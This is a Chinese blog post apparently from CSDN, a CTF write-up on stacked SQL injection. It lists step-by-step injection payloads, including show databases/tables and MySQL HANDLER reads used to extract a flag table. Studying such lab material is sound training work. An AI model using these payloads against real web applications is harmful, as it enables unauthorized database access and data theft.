堆叠注入--攻防世界CTF赛题学习

最新推荐文章于 2024-08-05 21:05:25 发布
最新推荐文章于 2024-08-05 21:05:25 发布
阅读量782 收藏 1
点赞数
文章标签: 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52515588/article/details/129753844
版权

在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。

堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。

这个是攻防世界的一道CTF赛题。

采用寻常思路来寻找sql注入漏洞。

payload:1' and 1=1--+

 

 

利用payload:' and 1=2--+

可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。

接下来就是手工注入的常见思路,利用order by来猜列。

payload:' order by 1--+

在这里我们可以猜测有两列数据。

那么接下来利用union select 进行查询

 

发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。

 

 

payload:1';show databases;--+

 

payload:' ;show tables;--+

看到一个及其奇怪的表。

 

在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。

 

payload:';handler `1919810931114514` open;handler `1919810931114514` read first;--+

在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。

附一个学习链接:【MySQL】MySQL 之 handler 的详细使用及说明 - 灰信网(软件开发博客聚合) 

 

 

 

丞星星
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
入门网络安全必备CTF题型介绍
Hack0812的博客
11-27 2690
想要入行网络安全,快而有效的方法就是打CTFCTF 题目类型一般分为 Web 渗透、RE 逆向、Misc 杂项、PWN 二进制漏洞利用、Crypto 密码破译。
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
2024最新最全【CTF攻防赛】零基础教程,入门到精通,看完这一篇就够了!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-14 728
如果你也想学习:黑客&网络安全的零基础攻防教程。
常见 Web 安全攻防总结
qingkahui24689的博客
05-24 998
Web 安全的对于 Web 从业人员来说是一个非常重要的课题,所以在这里总结一下 Web 相关的安全攻防知识,希望以后不要再踩雷,也希望对看到这篇文章的同学有所帮助。今天这边文章主要的内容就是分析几种常见的攻击的类型以及防御的方法。也许你对所有的安全问题都有一定的认识,但最主要的还是在编码设计的过程中时刻绷紧安全那根弦,需要反复推敲每个实现细节,安全无小事。本文代码 Demo 都是基于 Node.js 讲解,其他服务端语言同样可以参考。
浅析常见WEB安全漏洞及其防御措施_web漏洞防护
Z4400840的博客
06-25 893
网络攻防中,Web系统通常是攻击者的首选目标,攻击者大都通过Web打点的方式,先拿到边界Web服务器的权限,再以此为跳板实施内网横向渗透。由于Web系统通常涉及大量的用户数据和敏感信息,一旦受到攻击或破坏,可能造成数据泄露、服务中断等影响。相较于攻击方,Web系统也是防守方的重点防护对象。作为安全开发或安全运营人员,及早发现和修复潜在的WEB安全漏洞,不仅有助于提高互联网业务系统的稳定性,也能降低后期安全运营工作的压力和成本。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线。
小孩子不懂事,写着玩的
qq_45981247的博客
04-24 409
自用笔记
260道网络安全工程师面试题(附答案)
Z4400840的博客
06-03 794
2024年过去了一大半,先来灵魂三连问,年初定的目标完成多少了?薪资涨了吗?女朋友找到了吗?​好了,不扎大家的心了,接下来进入正文。由于我之前写了不少网络安全技术相关的文章和回答,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人私信问我:我刚入门网络安全,该怎么学?想找网络安全工作,应该要怎么进行技术面试准备?工作不到 2 年,想跳槽看下机会,有没有相关的面试题呢?
soreatu#My-CTF-Challenge#ctf赛题设计说明2
07-25
[题目考点]:1. AES加密模式2. 登录协议[是否原创]:原创[题目环境]:[特别注意]:[题目制作过程]:cd ./源码docker build . -t
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf题库ctf-pwn赛题收集
03-31
CTF题库是学习和提高网络安全技能的极好途径。它们提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。如果您对网络安全感兴趣,请尝试参加一个CTF比赛或挑战集,它们将为您提供有趣和...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Write-up:CTF撰写和信息
03-21
CTF(Capture The Flag)是网络安全领域的一种竞赛形式,它模拟了现实世界中的安全挑战,参赛者通过解谜、逆向工程、网络攻防等手段获取“旗子”(通常是代表解题成功的字符串),以此来得分。CTF比赛涵盖了密码学、...
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 820
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 371
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 618
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 589
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 1724
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网安新声 | 微软蓝屏事件安全启示录
WAJXY2021的博客
08-05 182
微软蓝屏事件敲响警钟,给行业带来什么样的反思呢?
网络功防大赛ctf赛题
07-24
网络攻防大赛CTF赛题是一种网络安全竞赛模式,目的是锻炼参赛者在信息安全技术上的实战能力。CTF即Capture The Flag,中文就是抓住旗帜的意思。 CTF赛题通常包含各种各样的安全问题,例如密码学、网络安全、移动安全、二进制漏洞等等。参赛者需要根据提供的资源和条件,找出解决问题的方法,并尽快找到旗帜(Flag)。 旗帜是赛题的关键,它们通常是一串特定格式的字符串,如"flag{...}"。找到旗帜意味着成功攻破了这个赛题。然而,攻破赛题并不仅仅意味着获得旗帜,还需要通过各种技术手段保护自己的系统,防止其他参赛者攻击。 CTF赛题的设计通常非常有挑战性,旨在考验参赛者的技术实力和解决问题的能力。参赛者需要具备扎实的计算机基础知识,对各种漏洞和攻击手段有一定的了解,同时能够分析和解决问题。 CTF赛题的丰富多样性也吸引了众多安全爱好者的参与。通过参与这样的赛事,他们能够不断学习新的知识和技术,提升自己在信息安全领域的竞争力。 总之,网络攻防大赛CTF赛题是一种刺激有趣的竞赛形式,在提高参赛者的安全技术能力的同时,也为信息安全领域的发展做出了贡献。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值